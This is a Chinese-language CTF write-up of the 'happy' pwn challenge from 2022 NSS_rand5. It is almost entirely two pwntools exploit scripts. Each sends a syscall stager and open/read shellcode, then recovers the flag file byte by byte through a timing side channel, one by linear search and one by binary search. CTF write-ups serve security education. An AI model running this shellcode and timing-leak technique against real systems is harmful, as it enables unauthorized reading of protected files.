---
title: 2022 NSS_rand5 pwn 复现
date: 2022-08-29 06:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=44/
pin: false
published:
---

赛后做了一下

## happy

![image-20220829095938640](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220829095938640.png)

遍历法

```python
# _*_ coding:utf-8 _*_
from pwn import *
import sys
import struct
import os
import hashlib
from hashlib import sha256
# context.log_level = 'debug'
context(arch='amd64', os='linux')

ip = ''
port = ''
# p = remote(ip,port)
# p = process("./happy")

def dbg(con=''):
    gdb.attach(p,con)
    # pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
#-----------------------------------------------------------------------------------------


def pwn(index,ch):
	# dbg("b *$rebase(0x1355)\nc\n")
	p.recv()
	pay = "\x31\xff\x48\x89\xd6\x0f\x05\xe8"
	pay = pay.ljust(8,'\x00')
	s(pay)
	pay = '''
		nop
		nop
		nop
		nop
		nop
		nop
		nop
	 	mov eax, 0x67616c66 ;// flag
	    push rax

	    mov rdi, rsp
	    xor eax, eax
	    mov esi, eax
	    mov al, 2
	    syscall ;// open

	    mov edi, eax
	    mov rsi, 0x100200
	    xor eax, eax
	    syscall ;// read

	    loop:
	    cmp byte ptr[rsi+{0}], {1}
	    jz loop
	    ret
	'''.format(index,ch)
	sl(asm(pay))

flag = ""
index = 0
last = 'a'
while True:
    for ch in range(32,127):
        p = process("./happy")
        # for i in range(10):
        #     try:
        #         p = remote("43.143.7.97","28399")
        #         break
        #     except:
        #         sleep(3)
        #         continue
        pwn(index, ch)      
        start = time.time()
        try:
        	p.recv(timeout=2)
        except:
            pass
        end = time.time()
        p.close()
        # print start,end
        if(end-start >= 1.5):
            flag += chr(ch)
            last = chr(ch)
            print("[ flag + 1 ] " + flag)
            break
        	
    if(last == '}'):
        break  
    index += 1
print("flag: " + flag)
```

二分法

```python
# _*_ coding:utf-8 _*_
from pwn import *
import sys
import struct
import os
import hashlib
from hashlib import sha256
# context.log_level = 'debug'
context(arch='amd64', os='linux')

ip = ''
port = ''
# p = remote(ip,port)
# p = process("./happy")

def dbg(con=''):
    gdb.attach(p,con)
    # pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
#-----------------------------------------------------------------------------------------


def pwn(index,ch):
# 	dbg("b *$rebase(0x1355)\nc\n")
	p.recvuntil('box to you)\n')
	pay = "\x31\xff\x48\x89\xd6\x0f\x05\xe8"
	pay = pay.ljust(8,'\x00')

	s(pay)

	pay = '''
		nop
		nop
		nop
		nop
		nop
		nop
		nop
	 	mov eax, 0x67616c66 ;// flag
	    push rax

	    mov rdi, rsp
	    xor eax, eax
	    mov esi, eax
	    mov al, 2
	    syscall ;// open

	    mov edi, eax
	    mov rsi, 0x100200
	    xor eax, eax
	    syscall ;// read

	    cmp byte ptr[rsi+{0}], {1}
	    ja loop
	    mov al,0x3c
        syscall
	    loop:
	    jmp loop
	'''.format(index,ch)
	sl(asm(pay))


flag = ""

count = 1
for i in range(0x40):# len(flag)
    left = 0
    right = 127
    while(left < right):
        p = process("./happy")
        # p = remote("43.143.7.97","28977")
        mid = (left + right)/2 
        pwn(i,mid)
        start = time.time()
        try:
            # p.recvline()
            print p.recv(timeout=0.5)
            end = time.time()
            # print start,end
            if end - start > 0.1:
        		# print(chr(left))
        		left = mid + 1# not with mid
        except:
            right = mid
        p.close()
        # os.system('clear')
        success("time-->"+str(count))
        success("mid-->"+str(mid))
        success("left-->"+str(left))
        success("right-->"+str(right))
        success("flag:"+flag)
        count += 1
    flag += chr(left)
    success("flag:"+flag)
    if flag[-1] == "}":
    	break

ia()
```

